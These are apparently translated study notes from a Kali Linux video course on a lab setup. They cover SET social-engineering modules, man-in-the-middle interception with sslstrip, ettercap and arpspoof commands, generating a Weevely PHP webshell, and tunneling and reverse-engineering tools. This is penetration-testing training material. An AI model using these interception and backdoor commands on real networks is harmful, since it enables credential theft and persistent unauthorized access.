Construction and testing of network attack and defense environment
The environment includes Windows target machine, Linux target machine, Windows attack machine, and Linux attack machine
. The following picture shows the IP addresses of the four machines. The 
following picture shows the connectivity test between the test target machine and the attack machine:
kali video learning:
Section 31 SET exploited by kali vulnerabilities
The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration testing tool that provides a very rich library of attack vectors. is an open source social engineering exploit kit, usually used in conjunction with metasploit.
1. Enter settoolkit on the command line to open the SET suite
2. Command option 1 as shown in the figure above is a social engineering attack. Enter 1 and press Enter to see the corresponding module.
The meaning of the 11 items on the way is: 
Obviously, the second one of my kali is a quick attack frame.
3. Spear phishing attack 
4. Website attack 
5. Media infection tool 
assists Autorun.inf to execute Exploit to get a returned SHELL, and it can also be combined with the backdoor of Metasploit.
6. Create the payload and the listener 
IP address that is the current IP address as the return. Enter to list multiple backdoors.
7. Mass email attack 
8. Arduino-based attack 
9. SMS spoofing attack 
10. Wireless access point attack
He will create a virtual wireless AP through which all connected device traffic can be captured. 
11. The QR code attack
fills in a dangerous URL, so that the attacker scans the QR code to automatically access the page. 
12, powershell attack
13, third-party module
14, fasttrack module
Section 32 kali sniffing spoofing and man-in-the-middle attacks
To complete a man-in-the-middle attack, here are methods for ARP spoofing, DNS spoofing and sniffing, and session hijacking.
1. Enable port forwarding for kali settings echo 1 > /proc/sys/net/ipv4/ip_forward
2. ssltrip
To hijack SSLthe data, the HTTPSdata needs to be changed to HTTP: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port8081
let sslstripit listen on port 8081: sslstrip -l 8081
3. Preparation of
ettercap ettercap is a set of tools for man-in-the-middle attacks, and the name of the dsniff suite. Its strength is that it supports plug-ins and filtering scripts, and directly displays account numbers and passwords without manual data extraction. If it is the first time to perform a man-in-the-middle attack operation, then configure the ettercap under kali.
The configuration file is /etc/ettercap/etter.conf. First, change both ec_uid and ec_gid to 0: 
after modification, as shown in the figure. Modifications can be opened and saved directly from the folder. 
Then find the line if you use iptables under the Linux category, remove the comment (#) as above, and turn on forwarding. 
Open the graphical interface as follows: 
4. Use ettercap to
open ettercap, select sniff option->unified sniffing->select network card->hosts option: first scan for hosts, and then select host list after scanning. 
It is embarrassing to find that five hosts have been added to the host list . The 
network is better and I can't log in at all. . 5. The dsniff
suite The
dsniff suite is mainly arpspoof and dsniff. The former is used for ARP spoofing, and the latter is used for sniffing. The steps for attacking are as follows:
Perform ARP spoofing:
arpspoof [-i interface (network card)] [-c own|host|both (spoofing method, usually both)] [-t target[...]],[-r|-w savefile] [ expression]
6. Session hijacking
Here we mainly use cookies as an example to illustrate the usage of session hijacking.
7. Picture interception
Section 33 Authority Maintenance Backdoor
Permission maintenance includes three subclasses of Tunnel toolset, Web backdoor, and system backdoor. The system backdoor and the web backdoor are collectively referred to as backdoors, which are malicious programs left behind to facilitate re-entry into the system after penetration testing.
1. Weevely of WEB backdoor
Weevely is a webshell tool written in python (integrates webshell generation and connection, only for safe learning and teaching, and illegal use is prohibited), which can be regarded as a kitchen knife replacement tool under linux (limited to php), some modules are not available on win. All in all, it's a good tool.
Generate php backdoor, weevely generate test ~/1.php, test is the password, generate ~/1.php locally
Section 34 Tunnel for Kali Privilege Maintenance
Permission maintenance includes three subclasses of Tunnel toolset, web backdoor, and system backdoor. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies. 
1. CryptCat
Netcat is known as the Swiss Army Knife of network tools.
2. DNS2TCP
DNS tunnel is the DNS channel used to transmit data.
3. Iodine
4. Miredo
Miredo is a network tool, mainly used for IPV6 Teredo tunnel conversion of BSD and Linux. It can convert network connections that do not support IPV6 to IPV6. IPV6 and TUN tunnel support are required in the kernel.
5.
A tool is often used in Proxychains intranet penetration testing. For example, we use Meterpreter to open a Socks4a proxy service. By modifying the /etc/prosychains.conf configuration file and adding a proxy, other tools such as sqlmap and lamp can be used directly. The proxy scans the intranet.
6. Proxytunnel
Proxytunnel can connect to remote servers through standard Https proxy, which is a proxy that realizes the function of bridging. Especially for Http(s) transfers over SSH.
7. Ptunnel
establishes tunnel communication with ICMP packets
8. Under the pwnat
intranet, UDP communication is used
9. Socat
can forward data on different protocols
Section 35 Kali Reverse Engineering Tools
1、edb
2、o1lydbg
3, jad
decompilation tool. For Java 
5, recstudio
decompilation tool 
6, apktool 
7, clang, clang++ 
8, d2j-dexjar
decompile dex files into jar files, and then you can use other tools to view the source code.
9. flasm 
10. java snoop
